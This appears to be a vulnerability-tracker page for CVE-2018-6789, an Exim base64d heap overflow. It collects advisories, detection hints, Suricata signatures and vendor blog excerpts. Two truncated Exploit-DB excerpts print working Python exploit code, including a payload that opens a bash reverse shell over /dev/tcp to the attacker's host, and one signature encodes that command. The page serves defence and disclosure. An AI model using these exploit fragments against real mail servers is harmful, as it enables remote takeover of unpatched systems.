CVE-2018-6789
published 2018-02-08CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen…
PriorityP196critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
82.24%
99.6th percentile
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | debian_linux | — | — |
| debian | exim4 | < exim4 4.90.1-1 (bookworm) | exim4 4.90.1-1 (bookworm) |
| exim | exim | < 4.90.1 | 4.90.1 |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect exploitation attempts by monitoring SMTP AUTH PLAIN commands containing crafted/malformed base64 strings (missing or manipulated padding '=' characters) sent to Exim on port 25. ↗
- →Alert on Exim SMTP sessions where AUTH PLAIN payloads contain Exim expansion strings such as '${run{...}}' — this indicates attempt to exploit the heap overflow for RCE via ACL store block overwrite. ↗
- →Detect oversized EHLO strings (e.g., 8000+ bytes) in SMTP sessions targeting Exim, which are used during exploitation to manipulate heap layout. ↗
- →Monitor for SMTP sessions sending large volumes of unrecognized/garbage commands (e.g., 0xFF-byte sequences) interleaved with AUTH PLAIN, indicative of heap grooming for this exploit. ↗
- →Identify Exim versions prior to 4.90.1 via SMTP banner grabbing; all such versions are vulnerable to CVE-2018-6789. ↗
- →Look for reverse shell callbacks over /dev/tcp from the Exim process, as the exploit payload uses bash's /dev/tcp redirection for the callback shell. ↗
- ·The vulnerability is only exploitable if AUTH PLAIN (or other base64-using authentication mechanisms) is advertised/enabled in the Exim SMTP listener configuration. The exploit checks for this and aborts if not available. ↗
- ·The off-by-one heap overflow occurs in the base64d() function due to a miscalculated buffer length; the overwrite is triggered by sending an invalid base64 string (manipulated padding), so base64 input validation at a WAF/proxy level may reduce exposure. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
CISA
Exim Buffer Overflow Vulnerability
cisa·2021-11-03·CVSS 9.8
CVE-2018-6789 [CRITICAL] CWE-119 Exim Buffer Overflow Vulnerability
Vulnerability: Exim Buffer Overflow Vulnerability
Affected: Exim Exim
Exim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2018-6789
Remediation Due Date: 2022-05-03
Ubuntu
Exim vulnerability
vendor_ubuntu·2018-02-12
CVE-2018-6789 Exim vulnerability
Title: Exim vulnerability
Summary: Exim could be made to crash or run programs if it received specially
crafted network traffic.
Meh Chang discovered that Exim incorrectly handled memory in certain
decoding operations. A remote attacker could use this issue to cause Exim
to crash, resulting in a denial of service, or possibly execute arbitrary
code.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
exim: buffer overflow in b64decode() function, possibly leading to remote code execution
vendor_redhat·2018-02-07·CVSS 9.8
CVE-2018-6789 [CRITICAL] exim: buffer overflow in b64decode() function, possibly leading to remote code execution
exim: buffer overflow in b64decode() function, possibly leading to remote code execution
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Statement: This issue affects the versions of Exim as shipped in Red Hat Enterprise Linux 5. Red Hat Enterprise Linux 5 is already in the Extended Life Phase of its life cycle and Exim is not on the list of components supported via Red Hat Enterprise Linux 5 Extended Life-cycle Support (ELS) add-on, therefore there's currently no plan to address this issue in Red Hat Enterprise Linux 5. For more information about Red Hat Enterprise Linux 5 life cycle and ELS add-on scope of support, see:
https://access.re
Debian
CVE-2018-6789: exim4 - An issue was discovered in the base64d function in the SMTP listener in Exim bef...
vendor_debian·2018·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789: exim4 - An issue was discovered in the base64d function in the SMTP listener in Exim bef...
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
Scope: local
bookworm: resolved (fixed in 4.90.1-1)
bullseye: resolved (fixed in 4.90.1-1)
forky: resolved (fixed in 4.90.1-1)
sid: resolved (fixed in 4.90.1-1)
trixie: resolved (fixed in 4.90.1-1)
GHSA
GHSA-868p-wr6f-7jfr: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
ghsa_unreviewed·2022-05-13
CVE-2018-6789 [CRITICAL] CWE-119 GHSA-868p-wr6f-7jfr: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
OSV
CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
osv·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789: An issue was discovered in the base64d function in the SMTP listener in Exim before 4
An issue was discovered in the base64d function in the SMTP listener in Exim before 4.90.1. By sending a handcrafted message, a buffer overflow may happen. This can be used to execute code remotely.
VulnCheck
Exim Buffer Overflow Vulnerability
vulncheck·2018·CVSS 9.8
CVE-2018-6789 [CRITICAL] CWE-119 Exim Buffer Overflow Vulnerability
Exim Buffer Overflow Vulnerability
Exim contains a buffer overflow vulnerability in the base64d function part of the SMTP listener that may allow for remote code execution.
Affected: Exim Exim
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.csk.gov.in/alerts/STOP_ransomware.html; https://cisa.gov/news-events/cybersecurity-advisories/aa20-275a; https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF; https://us-cert.cisa.gov/ncas/alerts/aa20-275a; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trustwave.com/hubfs/Web/Library/Documents_pdf/2024_Trustwave_Professional_Services_Sector_Threat_Landscape.pdf
Ex
Suricata
ET EXPLOIT Exim Internet Mailer Remote Code Execution
suricata·2018-07-09
CVE-2018-6789 ET EXPLOIT Exim Internet Mailer Remote Code Execution
ET EXPLOIT Exim Internet Mailer Remote Code Execution
Rule: alert smtp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Exim Internet Mailer Remote Code Execution"; flow:established,to_server; content:"JHtydW57L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3Av"; reference:cve,2018-6789; reference:url,exploit-db.com/exploits/44571/; classtype:attempted-user; sid:2025793; rev:2; metadata:attack_target SMTP_Server, created_at 2018_07_09, cve CVE_2018_6789, deployment Datacenter, performance_impact Low, confidence High, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)
suricata·2018-03-13·CVSS 9.8
CVE-2018-6789 [CRITICAL] ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)
ET EXPLOIT [PT Security] Exim $HOME_NET 25 (msg:"ET EXPLOIT [PT Security] Exim <4.90.1 Base64 Overflow RCE (CVE-2018-6789)"; flow:established,to_server,only_stream; content:"|0D 0A|AUTH"; pcre:"/AUTH\s+\S+\s+(?:[a-zA-Z0-9\+\/=]{4})*+[a-zA-Z0-9\+\/=]{3}\s/"; reference:cve,2018-6789; reference:url,devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/; reference:url,github.com/ptresearch/AttackDetection/blob/master/CVE-2018-6789/cve-2018-6789.rules; classtype:attempted-admin; sid:2025427; rev:2; metadata:attack_target SMTP_Server, created_at 2018_03_13, cve CVE_2018_6789, deployment Perimeter, performance_impact Moderate, confidence Medium, signature_severity Major, tag CISA_KEV, updated_at 2024_03_17;)
Exploit-DB
exim 4.90 - Remote Code Execution
exploitdb·2018-10-24·CVSS 9.8
CVE-2018-6789 [CRITICAL] exim 4.90 - Remote Code Execution
exim 4.90 - Remote Code Execution
---
# Exploit Title: exim 4.90 - Remote Code Execution
# Date: 2018-10-24
# Exploit Author: hackk.gr
# Vendor Homepage: exim.org
# Version: exim -1:
auth_plain_available = True
if test:
if len(l) > 70:
sys.stdout.write(l[:70] + " ...\n")
sys.stdout.flush()
else:
print l.strip("\r").strip("\n")
data = data + l
if data.find(delim) > -1:
return data
if l == "\n" or l == "":
return ""
return data
def write(data):
f.write(data + "\n")
def ehlo(v):
write("EHLO " + v)
return readuntil('HELP')
def unrec(v):
write(v)
readuntil('command')
def auth_plain(v):
encode = v.encode('base64').replace('\n','').replace('=','')
write("AUTH PLAIN " + encode)
l = f.readline()
if test:
if l.find("not advert") > -1 or l.find("not supported")> -1:
raise Exception("NO AUTH PLAI
Exploit-DB
Exim < 4.90.1 - 'base64d' Remote Code Execution
exploitdb·2018-05-02·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim < 4.90.1 - 'base64d' Remote Code Execution
Exim & /dev/tcp/" + local_host + "/" + str(local_port) + " 0>&1\""
cmd_expansion_string = "${run{" + cmd + "}}\0"
auth_plain("J" * acl_smtp_rcpt_offset + cmd_expansion_string + "J" * (8200 - acl_smtp_rcpt_offset - len(cmd_expansion_string)))
print "[10] malloced ACL store block and overwrite the content of 'acl_smtp_rcpt' with shell expression"
write("MAIL FROM:")
readuntil("OK")
write("RCPT TO:")
print "[11] triggered RCPT TO and executing shell expression ... enjoy your shell!"
print
if __name__ == '__main__':
exploit()
HackerOne
Exim off-by-one RCE vulnerability
hackerone·2019-09-26·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim off-by-one RCE vulnerability
Exim off-by-one RCE vulnerability
Hi,
I found an off-by-one in Exim MTA utility function. It was reported to exim and official patch has been released, assigned CVE-2018-6789. This bug affects all versions of exim.
This bug is simple, but can be leverage to gain remote code execution, using skillful heap exploitation. Details are here: https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
I believe exim is widespread enough and it seems to fit all criteria. I wonder if this finding worths a bounty, or the reason why it is not included. Thanks!
## Impact
Pre-auth remote code execution on all versions of exim mail server
Bugzilla
BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
bugzilla·2018-06-13·CVSS 9.8
[CRITICAL] BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
BLRG-PT-18-004: Off-By-One Write in SECU_FilePasswd()
In file sign/nss_secutil.c the function SECU_FilePasswd() iterated over the phrases array which was stored on the heap. The length of the array was stored in nb. In case the while loop existed because i == nb, the zero-termination which followed wrote past the end of the array.
This led to a memory corruption, which is likely hard to exploit, but off by one writes on the heap have been exploited in the past [1].
The affected component is only used locally and the password input data can be considered trusted to a certain degree. Therefore the impact is limited.
X41 D-Sec GmbH advises to check for i ==nb before terminating the phrases buffer.
[1] https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/
Di
Bugzilla
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of fedora-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message
Bugzilla
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
CVE-2018-6789 exim: Buffer overflow in utility function, when pre-conditions are met, can lead to remote code execution [epel-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of epel-all.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
N
Bugzilla
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
bugzilla·2018-02-08·CVSS 9.8
CVE-2018-6789 [CRITICAL] CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
CVE-2018-6789 exim: buffer overflow in b64decode() function, possibly leading to remote code execution
In Exim 4.90 and earlier, there is a buffer overflow in an utility function, if some pre-conditions are met. Using a handcrafted message, remote code execution seems to be possible.
More information to follow.
Upstream advisory:
https://exim.org/static/doc/security/CVE-2018-6789.txt
Additional References:
https://bugzilla.novell.com/show_bug.cgi?id=1079832
http://seclists.org/oss-sec/2018/q1/133
Discussion:
Created exim tracking bugs for this issue:
Affects: epel-all [bug 1543269]
Affects: fedora-all [bug 1543270]
---
Upstream commit:
https://github.com/Exim/exim/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1
---
The issue here is a buffer overflow in the b64decode() functi
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyberbedrohungen
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabili
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay 2021/04/28 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilities
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Minacce cyber
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Ciberamenazas
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
## How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay Apr 28, 2021 Read time: ( words)
Save to Folio
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands of new vulnerabilitie
Trendmicro
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
blogs_trendmicro·2021-04-28
Manage Zero Day Exploits (ZDI) with Trend Micro Solutions
Cyber Threats
# How Trend Micro Helps Manage Exploited Vulnerabilities
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Read how Trend Micro protects customers from vulnerability exploits by blocking them as early as possible.
By: Jon Clay
2021/04/28
Read time: ( words)
Save to Folio
Photo credit: pxhere
As technological innovations evolve, protecting companies from cyber threats tomorrow secures their businesses today. Exploiting known vulnerabilities to successfully compromise an organization has long been a common tactic used by malicious actors. Whether Heartbleed, EternalBlue, or most recently Zerologon, threat actors take advantage of newly disclosed vulnerabilities in their attacks. But even with thousands o
Tenable
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
blogs_tenable·2020-10-23
Government Agencies Warn of State-Sponsored Actors Exploiting Publicly Known Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
blogs_qualys·2020-10-22·CVSS 9.8
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities | Qualys
#### Table of Contents
- Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020: The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post: On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and
mitigation efforts,” said the NSA advisory. It also recommended “crit
Qualys
NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
blogs_qualys·2020-10-22·CVSS 10.0
CVE-2020-15505 [CRITICAL] NSA Alert: Chinese State-Sponsored Actors Exploit Known Vulnerabilities
## Table of Contents
Detect 25 Publicly Known Vulnerabilities using VMDR
Update November 25, 2020 : The UK National Cyber Security Centre alerts that APT nation-state groups and cybercriminals are exploiting MobileIron RCE vulnerability (CVE-2020-15505).
Original post : On October 20, 2020, the United States National Security Agency (NSA) released a cybersecurity advisory on Chinese state-sponsored malicious cyber activity. The NSA alert provided a list of 25 publicly known vulnerabilities that are known to be recently leveraged by cyber actors for various hacking operations.
“Since these techniques include exploitation of publicly known vulnerabilities, it is critical that network defenders prioritize patching and mitigation efforts,” said the NSA advisory. It also recommended “critic
Tenable
How COVID-19 Response Is Expanding the Cyberattack Surface
blogs_tenable·2020-03-30
How COVID-19 Response Is Expanding the Cyberattack Surface
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2019-15846: Unauthenticated Remote Command Execution Flaw Disclosed for Exim
blogs_tenable·2019-09-06·CVSS 9.8
[CRITICAL] CVE-2019-15846: Unauthenticated Remote Command Execution Flaw Disclosed for Exim
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
blogs_tenable·2018-03-07·CVSS 9.8
CVE-2018-6789 [CRITICAL] Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
Blog / Cyber Exposure Alerts
Subscribe
# Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
Scott Caveza
March 7, 2018
2 Min Read
On February 10, the Unix-based email server Exim released an update to address a heap buffer overflow vulnerability that can be used by an unauthenticated attacker to remotely execute arbitrary code. The flaw, assigned CVE-2018-6789, is noted to exist in all versions of Exim, prior to their latest release, 4.90.1, which means the attack surface potential is very wide. A quick search on Shodan yields more than 6 million results.
### Vulnerability details
The vulnerability was originally discovered by DEVCORE, and details were published on their blog on March 6. The vulnerability is due to a flaw in the b64decode buffer length in
Tenable
Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
blogs_tenable·2018-03-07·CVSS 9.8
[CRITICAL] Exim Buffer Overflow RCE Vulnerability (CVE-2018-6789) – What You Need to Know
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
http://openwall.com/lists/oss-security/2018/02/10/2http://packetstormsecurity.com/files/162959/Exim-base64d-Buffer-Overflow.htmlhttp://www.openwall.com/lists/oss-security/2018/02/07/2http://www.securityfocus.com/bid/103049http://www.securitytracker.com/id/1040461https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/https://exim.org/static/doc/security/CVE-2018-6789.txthttps://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1https://lists.debian.org/debian-lts-announce/2018/02/msg00009.htmlhttps://usn.ubuntu.com/3565-1/https://www.debian.org/security/2018/dsa-4110https://www.exploit-db.com/exploits/44571/https://www.exploit-db.com/exploits/45671/http://openwall.com/lists/oss-security/2018/02/10/2http://packetstormsecurity.com/files/162959/Exim-base64d-Buffer-Overflow.htmlhttp://www.openwall.com/lists/oss-security/2018/02/07/2http://www.securityfocus.com/bid/103049http://www.securitytracker.com/id/1040461https://devco.re/blog/2018/03/06/exim-off-by-one-RCE-exploiting-CVE-2018-6789-en/https://exim.org/static/doc/security/CVE-2018-6789.txthttps://git.exim.org/exim.git/commit/cf3cd306062a08969c41a1cdd32c6855f1abecf1https://lists.debian.org/debian-lts-announce/2018/02/msg00009.htmlhttps://usn.ubuntu.com/3565-1/https://www.debian.org/security/2018/dsa-4110https://www.exploit-db.com/exploits/44571/https://www.exploit-db.com/exploits/45671/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-6789
2018-02-08
Published
2021-11-03
Added to CISA KEV
Exploited in the wild